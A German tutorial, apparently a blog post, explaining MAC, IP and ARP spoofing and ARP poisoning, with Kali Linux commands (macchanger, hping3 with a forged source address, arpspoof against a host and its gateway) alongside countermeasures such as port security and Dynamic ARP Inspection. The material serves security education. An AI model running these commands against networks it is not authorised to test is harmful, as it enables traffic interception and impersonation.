Spoofing- und Poisoning-Techniken: MAC-Spoofing, IP-Spoofing, ARP-Spoofing und ARP-Poisoning
Einleitung
Spoofing und Poisoning sind Techniken, die Angreifer einsetzen, um Netzwerke zu kompromittieren und sensible Informationen abzufangen oder zu manipulieren. In diesem Beitrag werden die Techniken MAC-Spoofing, IP-Spoofing, ARP-Spoofing und ARP-Poisoning detailliert behandelt, sowie deren Implementierung mit Kali Linux und geeignete Gegenmaßnahmen.
MAC-Spoofing
Definition: Beim MAC-Spoofing ändert ein Angreifer die Hardware-Adresse (MAC-Adresse) seines Netzwerkadapters, um sich als ein anderes Gerät auszugeben. Dies kann genutzt werden, um Netzwerkzugänge zu umgehen oder sich als ein legitimer Benutzer auszugeben.
Umsetzung mit Kali Linux
-
Tool installieren:
sudo apt install macchanger -
Aktuelle MAC-Adresse anzeigen:
sudo macchanger -s eth0 -
MAC-Adresse ändern:
-
Zufällige Adresse:
sudo macchanger -r eth0 -
Manuelle Adresse:
sudo macchanger -m 00:11:22:33:44:55 eth0
-
-
Bestätigen:
ifconfig eth0
Gegenmaßnahmen
-
Aktivieren von Port-Security auf Switches, um nur bestimmte MAC-Adressen zuzulassen.
-
Verwendung von Netzwerküberwachungstools wie
arpwatchzur Erkennung von MAC-Adressenänderungen.
IP-Spoofing
Definition: IP-Spoofing umfasst die Fälschung der Quell-IP-Adresse in Netzwerkpaketen. Angreifer verwenden diese Technik, um ihre Identität zu verbergen oder Denial-of-Service (DoS)-Angriffe durchzuführen.
Umsetzung mit Kali Linux
-
Tool installieren:
sudo apt install hping3 -
Gefälschte Pakete senden:
sudo hping3 -a 192.168.1.200 -c 1 192.168.1.1-
192.168.1.200: Gefälschte Quell-IP. -
192.168.1.1: Zieladresse.
-
-
Verkehr analysieren: Mit
tcpdumpoderWiresharkden Datenverkehr überwachen:sudo tcpdump -i eth0
Gegenmaßnahmen
-
Aktivierung von Ingress-Filterung auf Routern, um Pakete mit gefälschten Quell-Adressen zu blockieren.
-
Reverse Path Filtering:
echo 1 | sudo tee /proc/sys/net/ipv4/conf/all/rp_filter
ARP-Spoofing und ARP-Poisoning
ARP-Spoofing
Definition: ARP-Spoofing ist das Senden von gefälschten ARP-Antworten, um den ARP-Cache eines Zielgeräts zu manipulieren. Dadurch kann ein Angreifer den Datenverkehr abfangen.
ARP-Poisoning
Definition: ARP-Poisoning beschreibt den Zustand, in dem der ARP-Cache des Ziels durch falsche MAC-zu-IP-Zuordnungen manipuliert wurde. Dies kann sowohl durch Spoofing als auch durch Malware erfolgen.
Umsetzung mit Kali Linux
ARP-Spoofing durchführen:
-
Tool installieren:
sudo apt install dsniff -
IP-Weiterleitung aktivieren:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward -
Ziel- und Gateway-IP ermitteln:
-
ARP-Spoofing ausführen:
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 -
Gateway ebenfalls manipulieren:
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
-
-
Verkehr analysieren: Verwende
Wiresharkoder ähnliche Tools:sudo wireshark
ARP-Poisoning gezielt prüfen:
-
ARP-Cache des Ziels manipulieren:
- Falsche MAC-Adressen mit einem Tool oder Skript injizieren.
-
ARP-Cache-Status überprüfen:
-
Lokale Prüfung:
arp -a -
Beobachtung mit Netzwerktools wie
tcpdumpoderWireshark.
-
-
Ergebnisse des Poisoning verifizieren:
- Prüfen, ob mehrere IP-Adressen der gleichen MAC-Adresse zugeordnet sind.
Gegenmaßnahmen
-
Dynamic ARP Inspection (DAI): Schützt den ARP-Cache durch Verifizierung von ARP-Paketen.
-
Verwendung verschlüsselter Protokolle wie HTTPS, SSH und TLS.
-
Regelmäßige Prüfung des ARP-Caches:
arp -a
Zusammenfassung
Spoofing- und Poisoning-Techniken wie MAC-Spoofing, IP-Spoofing, ARP-Spoofing und ARP-Poisoning sind effektive Mittel, um Netzwerke zu kompromittieren. Ihre erfolgreiche Abwehr erfordert proaktive Überwachungs- und Konfigurationsmaßnahmen, wie z. B. Port-Security, Dynamic ARP Inspection und die Verwendung sicherer Protokolle.